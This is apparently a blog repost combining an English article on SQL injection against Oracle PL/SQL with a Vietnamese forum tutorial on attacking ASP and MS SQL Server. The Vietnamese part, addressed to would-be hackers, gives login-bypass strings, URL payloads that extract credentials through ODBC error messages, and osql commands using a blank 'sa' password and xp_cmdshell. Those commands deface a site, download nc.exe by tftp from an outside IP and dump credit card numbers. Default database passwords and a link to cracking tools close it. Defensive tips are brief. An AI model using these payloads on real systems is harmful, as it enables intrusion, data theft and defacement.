It is not possible to simply add another statement onto an existing statement built by the procedure for execution as it is with some other databases, such as MS databases. The following illustrates this with our sample procedure:

SQL> exec get_cust('x'' select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' select
username from all_users where 'x'='x'
-933ORA-00933: SQL command not properly ended

The procedure expects a surname of a customer and should build a statement of the form:

select customer_phone from customers where customer_surname='Jones'

As can be seen, it is possible to add extra SQL after the name by escaping out of the SQL statement by using quotes and adding in the extra SQL. The preceding example shows that an Oracle error is returned if we try and send two statements at once to the RDBMS. Statements in Oracle tools and languages are delimited by semicolons (;) so we can try that next:

SQL> exec get_cust('x'';select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x';select
username from all_users where 'x'='x'
-911ORA-00911: invalid character

Again this doesn’t work, as another Oracle error code is returned. Adding a semicolon after the first statement will not allow a second statement to be executed, so the only way to get Oracle to execute extra SQL is to either extend the existing where clause or to use a union or a subselect. The next example shows how to get extra data from another table. In this case, we will read a list of users in the database from the dictionary view ALL_USERS.

SQL> exec get_cust('x'' union select username from all_users where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select username from all_users where 'x'='x'
::AURORA$JIS$UTILITY$
::AURORA$ORB$UNAUTHENTICATED
::CTXSYS
::DBSNMP
::MDSYS
::ORDPLUGINS
::ORDSYS
::OSE$HTTP$ADMIN
::OUTLN
::SYS
::SYSTEM
::TRACESVR

The example works! We can also use subqueries to extend an existing select statement. These are less useful, as they cannot alter the existing select list used to add new columns from other tables; however, they can be used to alter which records are returned by the existing query. An example is shown to return all of the records in the table:

SQL> exec get_cust('x'' or exists (select 1 from sys.dual) and ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' or exists
(select 1 from sys.dual) and 'x'='x'
::999444888
::999555888
::999777888

The extra “and ‘x’=’x’” is needed to close the original quote expected in the SQL string in the procedure. The above example returns all of the records in our sample table. This is a simple example and the technique can be used more creatively than in this instance.

The next example discusses truncating the rest of a where clause so that all of the records in the table are returned. The classic use of this is the case where the Web application writers have implemented authentication and the method of logging in is to find a valid record in the users table where the username and password match. Such an example could be:

select * from appusers where username=’someuser’ and password=’somecleverpassword’

To truncate this behaviour we can make the SQL return all of the records in the table; this usually allows a login to occur. Usually this will return the administrator record first!! Here is an example of truncation with our sample table of customers. All of the records can be returned by using an “OR ‘x’=’x’” in the where clause as follows:

SQL> exec get_cust('x'' or ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' or 'x'='x'
::999444888
::999555888
::999777888

Next, the procedure has been modified to extend the SQL used so that there is a second part of the where clause to truncate. Here is the modified procedure first:

create or replace procedure get_cust2 (lv_surname in varchar2)
is
        type cv_typ is ref cursor;
        cv cv_typ;
        lv_phone        customers.customer_phone%type;
        lv_stmt         varchar2(32767):='select customer_phone '||
                                'from customers '||
                                'where customer_surname='''||
                                lv_surname||''' and customer_type=1';
begin
        dbms_output.put_line('debug:'||lv_stmt);
        open cv for lv_stmt;
        loop
                fetch cv into lv_phone;
                exit when cv%notfound;
                dbms_output.put_line('::'||lv_phone);
        end loop;
        close cv;
exception
        when others then
                dbms_output.put_line(sqlcode||sqlerrm);
end get_cust2;

This is to demonstrate the use of the “- -“ comment characters to truncate the end of a where clause. This technique is useful where an application screen has more than one entry field that is added to the dynamic SQL and passed to the database. To simplify adding extra SQL to get around all of the fields we can add a “- -“ in what we think is the first field on the screen and first add the SQL we need. The following demonstrates this:

SQL> exec get_cust2('x'' or ''x''=''x'' --');
debug:select customer_phone from customers where customer_surname='x' or 'x'='x'
--' and customer_type=1
::999444888
::999555888
::999777888

Running this, we can see that all three records are returned due to the “or” statement. If the comment wasn’t there, we would still include the line “and customer_type=1”. Another example on the same theme allows us to use the union and the select on the table all_users as above and then comment out the rest of the where clause.

All of the above examples show select statements being injected with extra SQL. The same principles also apply to insert statements, update statements and delete statements. Other statements available in Oracle include DDL (Data Definition Language) statements, which are statements to alter the schema or database instance. Examples include creating tables or indexes or altering the language set used. Statements cannot generally be mixed because, as was illustrated above, we cannot just send two statements to the RDBMS at the same time, so if a select statement is the only one available we cannot just add a delete or insert to it. Often applications include a way to send any SQL to the server. This is bad programming practice, as it allows statements such as DDL to be executed. It can be argued that this case is not SQL injection because any SQL can be executed, therefore you do not need to alter an existing piece!

The final piece of the puzzle to talk about is packages, procedures and functions. It is possible to call PL/SQL functions from SQL statements. The rules vary slightly with each version of Oracle and indeed it was not possible to do so until PL/SQL version 2.1, which came with Oracle RDBMS version 7.1. There are literally thousands of built-in functions and procedures provided with the standard packages. These generally start with DBMS or UTL. The headers can be found in $ORACLE_HOME/rdbms/admin or a list of packages procedures or functions can be obtained by querying the database as follows:

SQL> col owner for a15
SQL> col object_type for a30
SQL> col object_name for a30
SQL> select owner,object_type,object_name
  2  from dba_objects
  3  where object_type in('PACKAGE','FUNCTION','PROCEDURE');

OWNER           OBJECT_TYPE                    OBJECT_NAME
--------------- ------------------------------ ------------------------------
SYS             FUNCTION                       CLIENT_IP_ADDRESS
SYS             FUNCTION                       DATABASE_NAME
SYS             FUNCTION                       DBJ_LONG_NAME
SYS             FUNCTION                       DBJ_SHORT_NAME
SYS             PACKAGE                        DBMSOBJG
…
CTXSYS          PACKAGE                        DR_DEF
CTXSYS          PROCEDURE                      SYNCRN

391 rows selected.

Here is an example that calls a built in function supplied with Oracle. The function (SYS.LOGIN_USER) in this case is quite simple and just returns the logged-in user, but it illustrates the principle.

SQL> exec get_cust('x'' union select sys.login_user from sys.dual where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select sys.login_user from sys.dual where 'x'='x'
::DBSNMP

The functions or procedures that can be called from SQL are quite limited: the function must not alter the database state or package state if called remotely, and the function cannot alter package variables if it is called in a where clause or group by clause. In versions earlier than Oracle 8, very few built-in functions or procedures can be called from a PL/SQL function that is called in SQL statements. The restrictions have been lifted somewhat from Oracle 8, but users should not expect to be able to call file or output type packages such as UTL_FILE or DBMS_OUTPUT or DBMS_LOB directly from SQL statements, as they must be executed in a PL/SQL block or called by the execute command from SQL*Plus. It is possible to use many of these procedures if they are part of a function that is written to be called from SQL.

To SQL inject and use PL/SQL packages, procedure or functions really requires a case of dynamic PL/SQL. If a form or application builds and executes dynamic PL/SQL in the same manner as described above, the same techniques can be used to insert calls to standard PL/SQL packages on any PL/SQL packages or functions that exist in the schema.

If any database links exist from the database being attacked to any other database in the organisation, those links can also be utilized in SQL injection attempts. This allows an attack through the firewall to a database that is potentially not even accessible from the Internet! Here is a simple example using our PL/SQL procedure to read the system date from another database on my network.

SQL> exec get_cust('x'' union select to_char(sysdate) from sys.dual@plsq where ''x''=''x');
debug:select customer_phone from customers where customer_surname='x' union
select to_char(sysdate) from sys.dual@plsq where 'x'='x'
::13-NOV-02

Conclusion

This concludes the first instalment in our two-part series on SQL injection and Oracle database software. This article has offered a brief overview of SQL injection, as well as some examples of how this technique may be employed against Oracle software. The next part will cover detecting SQL injection and protecting against SQL injection.

Pete Finnigan is a freelance consultant specialising in Oracle and security of Oracle. Pete is currently working in the UK financial sector and has recently completed the new Oracle security step-by-step guide for the SANS institute. Pete has many years of development and administration experience in many languages. Pete is regarded as one of the worlds leading experts on Oracle security.

Watch for the forthcoming book The SANS Institute Oracle Security Step-by-step – A survival guide for Oracle security written by Pete Finnigan with consensus achieved by experts from over 53 organizations with over 230 years of Oracle and security experience. Due to be published in the next few weeks by the SANS Institute.

Relevant Links

All of the code from this paper is available from the author’s Web site from the scripts menu – SQL and PL/SQL option.<!–
www.petefinnigan.com

Protecting Oracle Databases Whitepaper
Aaron Newman, Application Security Inc

Hackproofing Oracle Application Servers
David Litchfield, NGSSoftware Insight Security Research

Rain Forest Puppy

RFPlutonium to fuel your PHP-Nuke
Rain Forest Puppy

NT Web Technologies Vulnerabilities
Rain Forest Puppy

——————–More————————

Bài này sưu tầm từ http://k49c.net/forum/

Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để để đạt được tính hấp dẫn của các chương trình desktop cổ điển. Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database. Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL. Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng – client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt. Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó. Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL )

Cơ sở dữ liệu là trái tim của một website thương mại. Một cuộc tấn công vào server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty. Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng. Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn. Hầu hết các website thương mại dùng Microsoft SQL (MSSql) và Oracle. MSSQL vẫn đang chiếm ưu thế trên thị trường vì giá thành rẻ. Trong khi Oracle server được bán mắc hơn. Oracle đã từng tuyên bố là “không thể xâm nhập được”, nhưng những hacker coi đó như là 1 lời thách thức và đã tìm ra rất nhiều lỗi trong Oracle server..

Bài viết được chia làm 2 phần
1. Dùng HTTP cổng 80
2. Dùng MS SQL cổng 1434

Phần 1 – Dùng cổng 80 HTTP
—————————————————————-

Kiến thức trong phần này hữu ích không chỉ đối với các hacker mà còn với những người thiết kế web. Chỉ cần một lỗi thông thường tạo ra bởi người thiết kế web có thể làm lộ thông tin về CSDL của server cho hacker. Toàn bộ mục đích của trò chơi là các chuỗi truy vấn. Người đọc coi như có kiến thức về các truy vấn và ngôn ngữ asp ( active server pages ). Thêm nữa là cách tấn công này thường chỉ cần dùng bằng 1 trình duyệt internet. Vì vậy bạn không cần bất cứ một tool nào ngoại trừ IE hay Netscape.

Thông thường, để làm 1 trang đăng nhập, người thiết kế web sẽ viết 1 đoạn mã như sau:

login.htm

<html>
<body>
<form method=get action=”logincheck.asp”>
<input type=”text” name=”login_name”>
<input type=”text” name=”pass”>
<input type=”submit” value=”sign in”>
</form>
</body>
</html>

File logincheck.asp nằm trên server dùng để kiểm tra thông tin do user nhập vào có nội dung:

logincheck.asp

<@language=”vbscript”>
<%
dim conn,rs,log,pwd
log=Request.form(“login_name”)
pwd=Request.form(“pass”)

set conn = Server.CreateObject(“ADODB.Connection”)
conn.ConnectionString=”provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb”
conn.Open
set rs = Server.CreateObject(“ADODB.Recordset”)
rs.open “Select * from table1 where login=’”&log& “‘ and password=’” &pwd& “‘ “,conn
If rs.EOF
response.write(“Login failed”)
else
response.write(“Login successful”)
End if
%>

Thoạt tiên đoạn code trên có vẻ ổn. 1 người dùng type username và pass trong trang login.htm và click ‘Submit’. Giá trị được type vào sẽ được browser chuyển về cho logincheck.asp kiểm tra bằng cách dùng câu truy vấn “Select * from table1 where login=’”&log& “‘ and password=’” &pwd& “‘ “.
Mọi thứ có vẻ OK ? Chuỗi truy vấn cũng OK. Nhưng nếu 1 trang login được làm như thế thì 1 hacker sẽ có thể dễ dàng đăng nhập mà không cần một password hợp lệ nào đó. Nhìn lại chuỗi truy vấn:

“Select * from table1 where login=’”&log& “‘ and password=’” &pwd& “‘ “

Nếu 1 user type tên đăng nhập là “hack” và mật khẩu là “passne” thì những giá trị này sẽ được chuyển cho trang asp với method “POST” và câu truy vấn trên trở thành:

“Select * from table1 where login=’ hack’ and password=’ passne ‘ “

Tốt. Nếu như có 1 dòng chứ login name “hack” và password “passne” trong CSDL thì chúng ta sẽ nhận được thông báo đăng nhập thành công. Nhưng nếu như type loginname là “hack” và password là hi’ or ‘a’='a’ trong phần password ? Câu truy vấn sẽ trở thành:

“Select * from table1 where login=’ hack’ and password=’ hi’ or ‘a’='a ‘ “

Click ‘Submit’ và Bingo, đăng nhập thành công. Chuỗi truy cập được thoả mãn khi điều kiện là password bằng ‘hi’ HOẶC ‘a’='a’. Điều này luôn đúng và hacker sẽ đăng nhập với nick ‘hack’. Có thể thử các chuỗi sau đây trong ô password nếu cách trên không làm được với một số website:

hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a

Dấu — được thêm vào làm cho phần còn lại của chuỗi truy vấn trở thành ‘chú thích’ nên các điều kiện khác sẽ không bị kiểm tra. Tương tự có thể dùng:
hack’ –
hack” –

hoặc những username khác và chọn lựa password bất kỳ để có thể đăng nhập được. Bởi vì trong câu truy vấn chỉ có phần username được kiểm tra là ‘hack’ và phần còn lại bị bỏ đi do có dấu — . Nếu may mắn gặp được vào những website mà người thiết kế web đã mắc những lỗi trên, và bạn có thể login với bất kỳ username nào.

Cách tấn công cao cấp hơn: dùng các thông báo lỗi của ODBC
————————————————————–

Theo trên ta có thể thấy cách login mà không cần phải biết bất cứ 1 password nào. Dưới đây là cách để đọc toàn bộ CSDL chỉ bằng cách dùng các truy vấn trong URL. Cách này chỉ thực hiện được đối với IIS servers, nghĩa là với các trang asp. Và IIS được sử dụng trong gần 35% các ứng dụng thương mại web. Vì vậy chắc chắn bạn sẽ tìm ra 1 nạn nhân sau khi chỉ search một vài website. Thí dụ như:

http://www.nosecurity.com/mypage.asp?id=45

trong URL, dấu ‘?’ cho thấy đằng sau nó, giá trị 45 sẽ được chuyển cho 1 thông số ẩn. Chúng ta hãy xem lại ví dụ trên, trang login.htm có 2 form input dạng text tên là ‘login_name’ và ‘pass’, và các giá trị của 2 form này sẽ được chuyển cho logincheck.asp

Việc đăng nhập thành công cũng có thể thực hiện bằng cách mở trực tiếp trang logincheck.asp bằng cách dùng link:http://www.nosecurity.com/loginchec…ack&pass=passne nếu method là GET thay vì POST ( save html lại và sửa POST bằng GET )

Lưu ý: sự khác nhau giữa GET và POST là POST sẽ không hiện ra các giá trị được chuyển sang trang sau trên URL trong khi GET làm hiện lên các giá trị này. Để biết thêm về GET và POST nên đọc thêm RFC 1945 và 2616 trong giao thức HTTP

Sau dấu ‘?’ thì các biến được dùng trong trang logincheck.asp sẽ được gán bằng giá trị hacker type vào. Trong URL trên thì login_name sẽ được gán với giá trị hack. Các giá trị khác nhau được ngăn cách bởi dấu ‘&’
Quay trở lại trang index.htm, biến id có thuộc tính ẩn và tuỳ theo những link người dùng click, giá trị của id sẽ thay đổi. Giá trị này sẽ được chuyển vào trong câu truy vấn mypage.asp và user sẽ được trả về trang mình muốn. Ứng với giá trị của ‘id’ là 46 sẽ có một trang khác.

Chúng ta bắt đầu hack: type thêm vào trên URL câu truy vấn sau:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

information_schema.tables là một table hệ thống chứa thông tin về tất cả table của server. Trong đó có một field table_name chứa tất cả tên của các table. Chuỗi query SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES trả về giá trị là tên của table đầu tiên với kiểu string (nvarchar) trong INFORMATION_SCHEMA.TABLES, và chúng ta lại gộp nó 45 là một giá trị số. Vì vậy server sẽ thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘logintable’ to a column of data type int. /mypage.asp, line

Trong thông báo lỗi trên ta nhận được một table là ‘logintable’. Table này có thể chứa tên truy cập và password của các user. Tiếp tục type câu lệnh sau lên URL:

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’–

Tương tự table_name, column_name cũng là 1 field trong table hệ thống INFORMATION_SCHEMA.COLUMNS chứa tất cả tên các column. Và ta đang gộp tên của column đầu tiên trong table ‘logintable’ với giá trị 45, nên sẽ có thông báo lỗi:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int. /index.asp, line 5

Thông báo lỗi cho thấy column đầu tiên trong ‘logintable’ là ‘login_id’, để lấy tên của column thứ 2:

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’ WHERE COLUMN_NAME NOT IN (‘login_id’)–

Output:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int. /index.asp, line 5

Chúng ta có thêm 1 column nữa là ‘login_name’, tiếp tục lấy column thứ 3

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’ WHERE COLUMN_NAME NOT IN (‘login_id’,'login_name’)–

Output:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘passwd’ to a column of data type int. /index.asp, line 5

Đây là thông tin ta cần có: password login. Bước kế tiếp là lấy thông tin login và password từ table ‘logintable’, type;

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable–

Output:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Rahul’ to a column of data type int. /index.asp, line 5

Đây rồi: 1 trong những login name là ‘Rahul’, câu lệnh lấy password của user Rahul sẽ là:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable where login_name=’Rahul’–

Output:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘P455w0rd’ to a column of data type int. /index.asp, line 5
OK, tên truy cập : Rahul và mật khẩu là p455w0rd. Ta đã crack được CSDL của www.nosecurity.com. Và điều này nhờ vào server đã không lọc dữ liệu truy vấn của người dùng. Lỗi SQL này vẫn còn gặp ở nhiều website, và phương pháp phòng chống tốt nhất là phân tích những request của user và lọc đi các ký tự như ‘, “, –, : ….

Phần 2: dùng cổng 1434 ( cổng giao tiếp SQL )
——————————————————

Chúng ta đã thấy cách làm thế nào để xâm nhập vào CSDL bằng cách dùng các malformed URL và chỉ bằng cổng 80 ( cổng http ). Sau đây ta sẽ hack database dùng port 1434. Trước khi hack chúng ta nên biết thật sự các database server là gì và hoạt động như thế nào, cùng với cách khai thác chúng.

Những người thiết kết MS SQL tạo ra một số thủ tục mặc định được lưu sẵn chung với sản phẩm của mình để giúp cho webdesigner linh động hơn. Các thủ tục này không có gì khác mà chính là các lớp hàm, được dùng để thực hiện những nhiệm vụ nào đó dựa trên các biến được truyền cho chúng. Chính những thủ tục này rất quan trọng đối với hacker, 1 số trong đó gồm:
sp_passsword -> đổi password cho 1 tên truy cập (login name) nào đó
VD: EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> hiển thị tất cả table trong database hiện tại
VD: EXEC sp_tables

xp_cmdshell -> cho phép chạy câu lệnh bất kỳ lền server với quyền admin của database ( cái này quan trọng nhất, vì thông thường database được cài mặc định với quyền root )

xp_msver -> hiển thị version của SQL server và tất cả thông tin về HĐH được sử dụng.

xp_regdeletekey -> xoá một key trong registry của windows
xp_regdeletevalue -> xoá một giá trị trong registry
xp_regread -> in 1 giá trị trong registry lên màn hình
xp_regwrite -> gán 1 giá trị mới cho 1 key
xp_terminate_process -> ngừng một process nào đó

Đây là một số các lệnh quan trọng. Thật ra có hơn 50 loại thủ tục như thế. Nếu muốn database được an toàn thì điều nên làm là xoá tất cả những thủ tục đó đi bằng cách mở Master database dùng chương trình MS SQL Server Enterprise Manager. Mở folder Extended Stored Procedures và xoá các thủ tục lưu trong đó bằng cách nhấn chuột phải và chọn delete

Lưu ý:”Master” là một database quan trọng của SQLchứa tất cả thông tin về hệ thống như là login name và các thủ tục có sẵn. Nếu 1 hacker xoá master database thì SQL server sẽ bị down vĩnh viễn. Ngoài “Master” db ra còn có “Syslogins” là table hệ thống mặc định chứ tất cả username và password để login vào db ( user của db khác user của ứng dụng web ). Điều nguy hiểm nhất trong MS SQL là MS SQL mặc định có một user là “sa” với password “” ( không có pass )

Tiếp theo là cách hack db. Đầu tiên ta cần tìm ra một server bị lỗi. Download 1 chương trình scan port và scan 1 dãy ip để tìm ip có port 1433 hoặc 1434 ( tcp hay udp ) mở. Đây là port dùng bởi MS SQL server. Ngoài ra port của Oracle server là 1512. VD như chúng ta tìm được một server có ip là 198.188.178.1, có rất nhiều cách để dùng các dịch vụ của SQL như là dùng telnet hoặc netcat tới port 1433/1434. Ngoài ra có thể dùng một tool tên là osql.exe được kèm theo với các SQL server 2000. Mở DOS prompt và type vào:
Cosql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Đây là help file cho osql. Tiếp tục:
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
Nếu chung ta nhận được dấu nhắc
1>
có nghĩa là login thành công, nếu không sẽ có thông báo lỗi login sai đối với user “sa”

Tới đây nếu ta muốn chạy bất kỳ câu lệnh nào đó lên server, chỉ cần dùng thủ tục “xp_cmdshell” như sau:

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

Tôi khuyến khích việc dùng -Q thay vì -q bởi vì chúng ta sẽ exit khỏi server ngay sau khi câu lệnh được thực hiện. Tương tự ta có thể chạy bất cứ một câu lệnh nào lên server. Một hacker thông minh còn có thể install backdoor nhằm để tiếp tục access vào server sau này. Ta cũng có thể dùng “information_schema.tables” để lấy list các tables và nội dung của chúng bằng cách:

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

Kiếm thông tin login trong các table như login, accounts, users …
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

và lấy thông tin về username cùng với credit card.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate
———– ———— ———-
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Có thể deface website bằng cách chạy lệnh sau ( chỉ trong trường hợp database server được install chung với webserver )

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by hack> C:\inetpub\wwwroot\index.html’”

Upload file lên server dùng tftp:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

Để download một file nào đó ta có thể dùng lệnh PUT thay vì GET, bởi vì các câu lệnh này sẽ được thực hiện trên server chứ không fải ở máy chúng ta. Nếu ta dùng GET, câu lệnh sẽ thực hiện trên server và sẽ download nc.exe từ máy của chúng ta tới server.

Tools dùng hack các SQL pass có rất nhiều trên web. Ngay cả lỗi tràn bộ đệm cũng có thể được dùng để điêu khiển hoàn toàn một hệ thống với quyền admin. Bài viết này chỉ đề cập một số vấn đề tổng quát về db server.

• Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Phương pháp phòng chống
—————————

<*> Đổi password mặc định của user “sa”
<*> Xoá tất cả các thủ tục được mặc định lưu trữ trên server
<*> Lọc những ký tự như ‘,”,–,: …
<*> Update SQL với những bản mới nhất
<*> Khoá các port SQL bằng cách dùng firewall

Một số website về SQL security”
http://sqlsecurity.com/
http://www.cert.com/

Any comments and good criticism is always accepted at guatehack@linuxmail.org

[End of Original Message]

1. Một số password default cho các super-user:
Oracle sys: oracle

mySQL (Windows) root:null

MS SQL Server sa:null

DB2 dlfm:ibmdb2
2. Collection các tool dùng cho SQL:
SQLTools.zip ———> www.lebuudan.net/SQLTools.zip
Bao gồm:
SQLcracker + passlist + userlist
SQLdos.exe
SQLscanner.exe
SQLping.exe
and more.

3.OSQL.exe nằm trong bộ MSDE của microsoft, nhưng tới 64Mb lận, có ai cần thì tui upload lên. Hông thì thui, host nhỏ xíu hà.

4. ebook/text :
ebook: http://www.hackersplayground.org/books.html
text: http://www.hackersplayground.org/papers.html
SQLinjection: http://www.hackersplayground.org/papers.html


Follow

Get every new post delivered to your Inbox.